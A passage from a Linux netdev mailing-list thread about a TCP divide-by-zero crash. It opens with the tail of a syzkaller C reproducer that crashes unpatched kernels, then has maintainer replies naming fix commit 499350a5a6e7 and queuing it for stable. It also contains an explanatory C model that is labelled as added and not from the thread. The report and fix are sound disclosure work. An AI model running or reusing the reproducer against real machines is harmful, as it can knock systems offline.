        "\x96\xfe\x46\x03\xfd\xfa\x25\xab\x5d\xa3\x2b\xf3\xa4\xd2\x18"
        "\xfa\x1a\xaf\x94\xf4\x51\xef\xea\x79\x20\x13\xee\xff\x33\x35"
        "\xcf\xe8\xb1\x3b\xee\x3c\x7d\xae\xcd\xaa\xea\xd4\xc6\x05\x94"
        "\x01\xbd\xaa\xa6\x5b\x8c\x3d\x99\xcb\x9e\x8f\x2b\xf5\x07\xb9"
        "\x8b\x3c\x87\x08\xb1\x6b\x04\x59\x05\xff\xd4\x1c\x58\x04\xb0"
        "\x96\x37\x14\x5f\x24\x68\x19\x91\x41\x07\x34\x9a\x0b\xd9\xf5"
        "\x07\x35\x0b\xb4\x87\x35\x22\x8d\x47\x9c\x91\x59\x19\xfd\xe8"
        "\xe2\x11\xe6\x1f\xb0\x6e\xa2\xc1\x61\x18\x79\x5a\xcc\x72\x81"
        "\xa5\x47\x2e\x2e\xb0\xd9\x16\x58\x90\xb0\xbf\x02\xd1\x99\x30"
        "\x7a\x5b\x59\xf2\x61\xe5\x0f\x16\x29\x2e\x58\x58\x26\x96\x7f"
        "\xc9",
        4096));
    r[199] = syscall(__NR_writev, r[1], 0x20007000ul, 0x7ul);
    break;
  case 12:
    NONFAILING(*(uint16_t*)0x2001c000 = (uint16_t)0x2);
    NONFAILING(*(uint16_t*)0x2001c002 = (uint16_t)0x224e);
    NONFAILING(*(uint32_t*)0x2001c004 = (uint32_t)0x20000e0);
    NONFAILING(*(uint8_t*)0x2001c008 = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2001c009 = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2001c00a = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2001c00b = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2001c00c = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2001c00d = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2001c00e = (uint8_t)0x0);
    NONFAILING(*(uint8_t*)0x2001c00f = (uint8_t)0x0);
    r[211] = syscall(__NR_connect, r[1], 0x2001c000ul, 0x10ul);
    break;
  }
  return 0;
}

void test()
{
  long i;
  pthread_t th[26];

  memset(r, -1, sizeof(r));
  for (i = 0; i < 13; i++) {
    pthread_create(&th[i], 0, thr, (void*)i);
    usleep(rand() % 10000);
  }
  usleep(rand() % 100000);
}

int main()
{
  int i;
  for (i = 0; i < 4; i++) {
    if (fork() == 0) {
      install_segv_handler();
      use_temporary_dir();
      loop();
      return 0;
    }
  }
  sleep(1000000);
  return 0;
}

^ permalink raw reply	[flat|nested] 4+ messages in thread

* Re: net/ipv4: divide error in __tcp_select_window
  2017-08-31  5:56 net/ipv4: divide error in __tcp_select_window idaifish
@ 2017-08-31 11:11 ` Neal Cardwell
  2017-08-31 19:25   ` David Miller
  0 siblings, 1 reply; 4+ messages in thread
From: Neal Cardwell @ 2017-08-31 11:11 UTC (permalink / raw)
  To: idaifish
  Cc: David Miller, Alexey Kuznetsov, Netdev, syzkaller, Wei Wang,
	Eric Dumazet

On Thu, Aug 31, 2017 at 1:56 AM, idaifish <idaifish@gmail.com> wrote:
> Hi:
>    This bug seems still can be triggered by the attached PoC on latest
> Ubuntu1604 (4.4.0-94-generic)
>
> ============================================================================
> divide error: 0000 [#1] SMP KASAN
> Modules linked in:
> CPU: 0 PID: 14933 Comm: syz-executor0 Not tainted 4.9.45 #1
> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
> Ubuntu-1.8.2-1ubuntu1 04/01/2014
> task: ffff880076ab9900 task.stack: ffff880062ae8000
> RIP: 0010:[<ffffffff829c1df3>]  [<ffffffff829c1df3>]
> __tcp_select_window+0x2f3/0x6b0 net/ipv4/tcp_output.c:2499
...
>  [<ffffffff8297c36e>] tcp_cleanup_rbuf+0x43e/0x4f0 net/ipv4/tcp.c:1468
>  [<ffffffff829815df>] tcp_recvmsg+0xc2f/0x25d0 net/ipv4/tcp.c:1937

Thanks for the report. I believe this tcp_recvmsg  => tcp_cleanup_rbuf
 => __tcp_select_window divide-by-zero issue was fixed in May by Wei,
in:

 499350a5a6e7 tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0
 https://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git/commit/?id=499350a5a6e7

Looks like we should probably mark this as a -stable candidate, so
that it will eventually make it to 4.4.y, 4.9.y, 4.12.y users, etc. (I
don't see the commit in those stable branches.)

thanks,
neal

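The failure mode Neal describes, modelled as an added example (not kernel code and not from this thread): a reset that leaves rcv_mss at 0 feeds a zero divisor into the window computation, while resetting it to TCP_MIN_MSS keeps the divide well defined. TCP_MIN_MSS is the kernel's own constant (88); the struct, the function names and the 1460 peer MSS are simplified stand-ins, and the "disconnect clears the ack state" sequence is assumed from the fix commit's description.

```c
#include <stdbool.h>
#include <stdio.h>

/* Kernel constant: the smallest MSS the stack will use. */
#define TCP_MIN_MSS 88U

/* Minimal stand-in for icsk->icsk_ack, keeping only the field that matters. */
struct ack_state {
    unsigned int rcv_mss;
};

/* Pre-fix reset: modelled on the ack state being cleared on disconnect,
 * which leaves rcv_mss == 0 (assumed from the fix commit's description). */
static void delack_init_before_fix(struct ack_state *a) { a->rcv_mss = 0; }

/* Post-fix reset: commit 499350a5a6e7 initializes rcv_mss to TCP_MIN_MSS. */
static void delack_init_after_fix(struct ack_state *a) { a->rcv_mss = TCP_MIN_MSS; }

/* Simplified model of the "window = (free_space / mss) * mss" step in
 * __tcp_select_window(). The real kernel divides unconditionally and traps
 * on mss == 0; this model returns -1 for that condition so it can be run. */
static long select_window(const struct ack_state *a, unsigned int free_space)
{
    if (a->rcv_mss == 0)
        return -1;                  /* kernel: "divide error" at this point */
    return (long)((free_space / a->rcv_mss) * a->rcv_mss);
}

/* Replays the reported sequence: a connected socket has learned a peer MSS,
 * is disconnected, then a recvmsg() drives window selection on the reset
 * state. Returns the window, or -1 if the computation hit a zero divisor. */
static long replay(bool fixed, unsigned int free_space)
{
    struct ack_state a = { .rcv_mss = 1460 }; /* constructed: MSS seen on the wire */
    if (fixed)
        delack_init_after_fix(&a);
    else
        delack_init_before_fix(&a);
    return select_window(&a, free_space);
}

int main(void)
{
    long before = replay(false, 65535);
    long after = replay(true, 65535);
    printf("before fix: %s\n", before < 0 ? "divide by zero" : "ok");
    printf("after fix:  window=%ld (multiple of %u)\n", after, TCP_MIN_MSS);
    return 0;
}
```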

* Re: net/ipv4: divide error in __tcp_select_window
  2017-08-31 11:11 ` Neal Cardwell
@ 2017-08-31 19:25   ` David Miller
  2017-08-31 19:37     ` Neal Cardwell
  0 siblings, 1 reply; 4+ messages in thread
From: David Miller @ 2017-08-31 19:25 UTC (permalink / raw)
  To: ncardwell; +Cc: idaifish, kuznet, netdev, syzkaller, weiwan, edumazet

From: Neal Cardwell <ncardwell@google.com>
Date: Thu, 31 Aug 2017 07:11:28 -0400

> Thanks for the report. I believe this tcp_recvmsg  => tcp_cleanup_rbuf
>  => __tcp_select_window divide-by-zero issue was fixed in May by Wei,
> in:
> 
>  499350a5a6e7 tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0
>  https://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git/commit/?id=499350a5a6e7
> 
> Looks like we should probably mark this as a -stable candidate, so
> that it will eventually make it to 4.4.y, 4.9.y, 4.12.y users, etc. (I
> don't see the commit in those stable branches.)

Ok, queued up for -stable, thanks.


* Re: net/ipv4: divide error in __tcp_select_window
  2017-08-31 19:25   ` David Miller
@ 2017-08-31 19:37     ` Neal Cardwell
  0 siblings, 0 replies; 4+ messages in thread
From: Neal Cardwell @ 2017-08-31 19:37 UTC (permalink / raw)
  To: David Miller
  Cc: idaifish, Alexey Kuznetsov, Netdev, syzkaller, Wei Wang, Eric Dumazet

On Thu, Aug 31, 2017 at 3:25 PM, David Miller <davem@davemloft.net> wrote:
>
> From: Neal Cardwell <ncardwell@google.com>
> Date: Thu, 31 Aug 2017 07:11:28 -0400
>
> > Thanks for the report. I believe this tcp_recvmsg  => tcp_cleanup_rbuf
> >  => __tcp_select_window divide-by-zero issue was fixed in May by Wei,
> > in:
> >
> >  499350a5a6e7 tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0
> >  https://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git/commit/?id=499350a5a6e7
> >
> > Looks like we should probably mark this as a -stable candidate, so
> > that it will eventually make it to 4.4.y, 4.9.y, 4.12.y users, etc. (I
> > don't see the commit in those stable branches.)
>
> Ok, queued up for -stable, thanks.

Great. Thanks!

neal

